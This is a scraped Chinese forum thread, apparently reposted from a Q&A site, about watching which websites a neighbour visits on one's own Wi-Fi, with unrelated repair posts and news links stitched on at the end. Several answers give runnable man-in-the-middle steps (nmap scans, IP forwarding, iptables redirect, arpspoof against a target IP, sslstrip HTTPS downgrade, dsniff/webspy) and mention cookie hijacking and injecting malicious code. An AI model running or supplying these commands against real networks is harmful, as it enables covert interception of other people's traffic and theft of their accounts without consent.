所有回答仅供网络渗透安全测试使用,严禁非法获取或篡改他人信息.。 相关问题:透过公共 Wi-Fi 热点上网可能会面临哪些安全风险?如何保障安全? 相关问题:无线路由器被蹭网后,有被黑的风险吗?
评论
以下教程基于Kali Linux https://www.kali.org/请不要将本回答所提到的工具用于非法用途
1. 扫描网络内用户 - Nmap
首先假定你的邻居已经连上了你家Wi-Fi,如果想要查看他浏览的内容,你需要先定位到哪一个设备是你的邻居。MAC地址和IP地址的话从路由器设置的页面就可以看到,如果还想查看更多信息的话,Nmap是一款非常实用的工具。
首先获得路由器网关的地址,如图所示我家Wi-Fi的路由器地址是192.168.0.1
route –n
然后用Nmap扫描连接到该网络下的所有设备,图里192.168.0.109就是我用来模拟邻居的另一台笔记本。不光IP和MAC地址可以显示,相应的设备信息(比如图中这个Huawei Technologies),用了什么什么操作系统(OSdetails)都可以在nmap扫描的结果中看到。记好邻居的IP和你路由器的地址,我们接下来要用到。
nmap -sS -O 192.168.0.1/24
2. 中间人攻击 – arpspoof & sslstrip
所谓中间人攻击(MitM)指的是攻击者插入到正在交流的双方中间,窃取并修改其中的通信,而双方仍然认为自己正和对方一对一的直接交流。
刚才有人说到现在很多网站用的都是HTTPS而不是HTTP,所以信息会被加密无法破解。那么首先什么是HTTP和HTTPS呢,我们可以简单的理解为两种网络通信时的协议,区别是HTTPS要比HTTP安全的多。的确HTTPS的信息很难破解,但是这不意味着我们面对HTTPS毫无办法。
sslstrip 这个工具可以把我们无法破解的HTTPS请求转换成HTTP请求。如图所示受害者想要通过HTTPS连接一个网站,arpspoof(待会儿会提到)这个工具可以让我的电脑伪装成路由器的样子,于是路由器会把收到的HTTPS请求转发给我的电脑。这时我用sslstrip把HTTPS请求转换成HTTP请求,再发回给路由器,路由器会紧跟着把HTTP请求转发给目标网站。目标网站收到HTTP请求后就和受害者建立了HTTP而不是HTTPS请求。
接下来是具体操作:
首先用这两条命令开启IP转发并建一个iptables rule 来让本机可以转发消息。
echo 1 >/proc/sys/net/ipv4/ip_forwardiptables -t nat -APREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
接下来arpspoof可以把目标设备的网络通信转发给我,interface用来指明你想用哪个网络接口,这个可以用ifconfig命令看到.
arpspoof -i interface -t target IP -r gateway IP
target IP和gateway IP我们在之前已经获得了,于是我实际输入的指令是:
arpspoof -i wlan0 -t192.168.0.109 -r 192.168.0.1
可以看到arpspoof已经开始工作,保持这个窗口开启,然后打开一个新的终端启动sslstrip
sslstrip -l 8080
这时邻居在这个网络下所做的事情就都记录在sslstrip的日志文件里了
cat sslstrip.log
收工。
参考文献
F. Callegati, W. Cerroni, M. Ramilli, Man-in-the-Middle Attack to the HTTPS Protocol, IEEE Security & Privacy, pp. 78-81, 2009.
V. Kumkar, A. Gupta, S. Shrawne, a Tiwari, and P. Tiwari, Vulnerabilities of Wireless Security Protocols (WEP and WPA2), Int. J. Adv. Res. Comput. Eng. Technol., vol. 1, no. 2, pp. 34C38, 2012.
C. Haralson, ”How To: Use SSLstrip On Kali Linux”, YouTube, 2016. [Online]. Available: https://www.youtube.com/watch?v=OtO92bL6pYE. [Accessed: 17- Apr- 2016].
评论
只能看到一些普通的网站信息,盗银行卡之类的,是非常难实现的。因为,现在很多网站都是https。这里的s就是security 安全的意思。
当使用https 的时候,像上面那个兄弟,用这种man in the middle 攻击是没意义的。因为,https 客户端和服务器之间会把信息加密并相互认证,你是破译不了中间的密码的。如果你能,那你肯定是蓝翔毕业的,清华都破解不了。
在10年前,局域网里面很多人这么玩,聚生网管之类的,都是靠arp欺骗来做一些事情。不过,也就只能盗个qq,或者传奇。
限制网速,或者把他踢下线可以做到的。
评论
如果只是问题的答案,我有一个普通的,叫天易成网络管理软件(唉,拿不到广告费也是苦),百度可以搜索的到,我用好几年了,现在不用了,因为网络够大了,不怕大家抢。
主要功能其实是限制局域网里他人的网速的。
然后可以查看每个人访问哪些网站,登陆的QQ号多少(密码看不到),然后跟哪些QQ号聊天等,还可以限制别人访问哪些网站。这一切是免费的,但有数量限制。
付费版功能应该很牛b,但我没用过,只能帮他们打广告来弥补他们了。
评论
简单简单
有一个叫做 dsniff 的工具包,就是专门用来做各种网络嗅探的。这个工具包的作者写这套软件的目的就是为了告诉人们自己赖以生存的网络环境是多么的不安全=) 这一整套的工具可以帮助你偷偷摸摸地获取到一系列的有趣信息(请遵守当地法律),比如说密码、电邮、文件啥的。
注意:请不要将本回答所提到的工具用于非法用途
当然,如果要监控指定的某一台设备,首先得获取它的IP地址,用一般的扫描工具(比如nmap)
sudo nmap -sV -T4 -O -F --version-light 192.168.1.1-255
就拿我的手机举例吧,也就是上面的192.168.1.104
首先用 arpspoof 定向流量到本机
sudo arpspoof -t 192.168.1.104 192.168.1.1
在另一个终端输入
sudo arpspoof -t 192.168.1.1 192.168.1.104
第一个命令发送arp包给手机(192.168.1.104),告诉手机这台电脑才是网关
第二个命令发送arp包给网关(192.168.1.1),告诉网关这台电脑才是手机
记得打开ip转发,这样系统才会把流量转发给真正的网关,不然的话就是断网而不是窃取流量了。=)
OS X:sysctl -w net.inet.ip.forwarding=1
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
做到这一步就已经可以在 Wireshark 里看到来自目标设备的流量了
再过滤一下http,所有正在浏览的网页就都出来了。dsniff里另外一个工具叫 websniff,配合 arpspoof 使用可以实时在本地浏览器上显示在目标设备上打开着的网页。
很简单的一行命令就行
sudo webspy 192.168.1.104
在OS X下因为XQuartz的原因不能正常使用,所以就不截图了。
要再专业一点的话,那就直接上 KALI 吧:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
评论
前几天住酒店,闲着无聊进酒店的公共wifi后台逛了一逛,发觉有题主所需要的功能:
路由用的是一个叫某快的产品:
1111738a3a519e008c4f0f34f2b07afc_hd.jpg (29.09 KB, 下载次数: 14)
下载附件 保存到相册
211262bddb4c996b1846afe8a1025b99_hd.jpg (37.24 KB, 下载次数: 15)
下载附件 保存到相册
有网址浏览记录功能:
d7c8b67db451330e7d1b8b5c12655e0c_hd.jpg (97.37 KB, 下载次数: 13)
下载附件 保存到相册
还有QQ登录记录功能:
296aaf42e5981cf762c383d7c827453d_hd.jpg (85.63 KB, 下载次数: 11)
下载附件 保存到相册
要是普通的无线路由,那就自己开台主机arp欺骗后抓包吧( ` )
要是路由器能刷Pandorabox,也可以在里面抓
评论
这个很简单,中间人攻击
环境:
Kali2.0 vm
Rtl8187L外置网卡
由于是你自己的wifi、那么完全不需要考虑破解wifi
Bettercap1.5.2
如果你想登录他的网站账号,还可以准备一个cookies替换工具,在火狐浏览器有插件,也包括菜刀、k8飞刀等工具
我是如何劫持北京丽都皇冠酒店局域网的
前阵子受邀参加补天年度颁奖典礼时在360帮定的酒店录制的。
文章详情
http://bbs.sssie.com/thread-1327-1-1.html
评论
看完回答我觉得我隔壁邻居的儿子要给我跪下了……
评论
在安全需求较高的场景下怕受到中间人攻击的话,可以使用安全的 VPN 连接到网络上。
另外,排名第一的通过 ARP 欺骗来实现中间人攻击的套路目测成功率比较低,大多数设备上可能都会安装了防火墙软件。
更直接的中间人攻击(通过物理中间件)会成功率指数上升。
评论
总感觉是题主想查自个男朋友上了啥网址
评论
用wireshark抓包分析。
对了,还能抓出你邻居的QQ号。
评论
没有人说路由器的方案。
我建议使用路由器来获取信息。
网关采用OpenWrt或者其他能跑软件的路由器;
安装Squid或者一些透明代理软件;
使用iptables,将指定来源IP的流量统统转发到透明代理上;
透明代理可以通过日志记录访问的地址,Cookie,甚至POST的内容等。
另外,篡改内容,插入恶意代码,劫持安卓手机下载的App,劫持DNS也是非常简单的事情。
最后,https降级攻击有朋友提过了。
以上仅是技术探讨,本人不承担任何责任。
评论
Wireshark可以抓抓包 看看邻居都喜欢看什么图图ˊ_>ˋ
评论
第一个人推荐的我就不说了,
我就推荐一个普通的,
虽然比zanti差点。但是zanti是要注册的。而且很多破解版也不安全。
我就发一个开源的吧。
但是基本功能类似,
名字叫dsploit
谢谢评论区提醒,
现在改版了
叫csploit
评论
简单的arp欺骗,中间人攻击~可以盗号哦( ° °)。https的话~可以劫持域名~
评论
哈哈哈哈哈哈哈,其实是题主偷用邻居的wifi然后怕邻居知道自己上过哪些网站。
问这个问题的目的就是评估邻居欲知自己上过哪些网站的难易程度以及概率。
ad51d57d3a0e2c5cf4d29209a029dee4_hd.jpg (45.93 KB, 下载次数: 13)
下载附件 保存到相册
真相只有一个!评论
我家的密码是123456789。。。。。。我爸设的。我说搞个复杂点的嘛,别被人家蹭网。
他说这么复杂干嘛,人家跟你说要用你家的网,你能不把密码告诉他吗?
我竟无言以对。。。。。。
评论
你们都不怕这是个钓鱼问题么。。。。。
评论
以下是最简单最准确的方法
1.去他家
2.打开他电脑
3.打开浏览器 Ctrl+H
评论
我怎么觉得你是想获取你女朋友/男朋友登陆的网站 电路 电子 维修 求创维42c08RD电路图 评论 电视的图纸很少见 评论 电视的图纸很少见 评论 创维的图纸你要说 版号,不然无能为力 评论 板号5800-p42ALM-0050 168P-P42CLM-01 电路 电子 维修 我现在把定影部分拆出来了。想换下滚,因为卡纸。但是我发现灯管挡住了。拆不了。不会拆。论坛里的高手拆解过吗? 评论 认真看,认真瞧。果然有收
·日本中文新闻 唐田绘里香为新剧《极恶女王》剃光头 展现演员决心
·日本中文新闻 真子小室夫妇新居引发隐私担忧
·日本中文新闻 前AKB48成员柏木由纪与搞笑艺人交往曝光
·日本学校 {日本国际学校}梅田インターナショナルスクール
·日本学校 LINE:sm287 陳雨菲、20歳、台湾からの留学生、東京に来たばかり
·日本留学生活 出售平成22年走行48000km 代步小车
·日本华人网络交流 円相場 一時1ドル=140円台まで上昇?
·日本华人网络交流 问日本华人一个问题
·日本旅游代购 富山接机
·生活百科 英国转澳大利亚转换插头
·汽车 【求助】修车遇到困难怎么办?